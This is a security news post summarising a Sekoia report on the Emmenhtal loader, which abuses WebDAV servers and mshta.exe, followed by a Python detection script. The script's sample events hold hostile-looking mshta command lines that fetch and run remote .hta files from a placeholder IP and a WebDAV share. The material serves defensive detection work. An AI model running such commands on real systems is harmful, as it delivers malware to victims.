Emmenhtal: a new word in the art of digital deception

Friend

How cybercriminals use legitimate technologies for their own purposes.

Sekoia has published a report that describes a relatively new malware downloader service called Emmenhtal. The main feature of this malware is the use of compromised WebDAV servers to host its clients' payloads.

Emmenhtal, also known as PeakLight, distributes various malware threats, such as infostealers, around the world. Since its launch in December 2023, it has been actively attracting the attention of cybersecurity professionals due to its secretive approach. The loader functions exclusively in memory, which makes it difficult to detect and analyze.

The Sekoia team investigated the infrastructure used to distribute Emmenhtal and found that the malicious files were hosted on WebDAV servers. WebDAV, being an extension of the HTTP protocol, allows you to manage files on web servers, which makes it useful for legal tasks. However, attackers are increasingly using this technology for their own purposes. As part of this scheme, users are redirected to a WebDAV server, where malware is downloaded through specially prepared files such as ".lnk".

Particular attention is drawn to the method of distribution through the use of the legitimate system file "mshta.exe", which is designed to execute HTML applications. Using these trusted system files allows attackers to bypass security mechanisms and hide their actions. In the analyzed Sekoia infrastructure, more than 100 WebDAV servers were identified through which malicious files are distributed.

In addition, experts have found that various malware families are being distributed through this infrastructure, including SelfAU3, DarkGate, Amadey, and others. This suggests that the infrastructure can be offered as a service to other attackers, providing the ability to rent servers and tools to host and deliver malware.

For several months, Emmenhtal's infrastructure used the same autonomous systems (AS) to host WebDAV servers, which may indicate the centralized nature of this operation. Among the AS used were Terasyst Ltd, Zonata, and others, which may indicate reliable agreements with providers.

Sekoia's findings indicate that Emmenhtal's infrastructure is likely a commercial service provided by the cybercriminal group. It offers an infrastructure for hosting and distributing many different types of malware.
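A detection check for the delivery chain the post describes (mshta.exe launched against content on a WebDAV share, and shortcuts opened from such a share), written here as an added example and not code from the Sekoia report; the process-creation events are constructed, the rule names are assumptions, and 203.0.113.10 is a documentation address.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" \\203.0.113.10@80\DavWWWRoot\share\update.hta'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe http://203.0.113.10/loader.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\ui\wizard.hta'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe \\fileserver\docs\notes.txt"},
]

# First UNC segment: \\host\  \\host@80\  \\host@SSL@443\ (the "@port" and "@SSL"
# forms are how Windows names a share reached over HTTP(S) via the WebDAV redirector).
UNC_HOST = re.compile(r"\\\\([^\\\s]+)\\")
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)


def is_webdav_path(text: str) -> bool:
    """True if a command line references a share that is WebDAV-backed, not SMB."""
    if "davwwwroot" in text.lower():
        return True
    m = UNC_HOST.search(text)
    return bool(m and "@" in m.group(1))


def classify_event(event: dict) -> list[str]:
    """Return the names of the rules this event matches; an empty list means no finding."""
    findings = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    if image.endswith("\\mshta.exe"):
        if is_webdav_path(cmd):
            findings.append("mshta_webdav_path")
        if REMOTE_URL.search(cmd):
            findings.append("mshta_remote_url")
    # A user opening a shortcut on a WebDAV share produces an explorer.exe child
    # whose arguments point back at that share, whatever the child image is.
    if parent.endswith("\\explorer.exe") and is_webdav_path(cmd):
        findings.append("webdav_path_from_explorer")
    return findings


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule names of every event that triggered at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify_event(e))]
```

The SMB path in the last sample is deliberately left unflagged, so the check stays quiet on ordinary file-server use.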
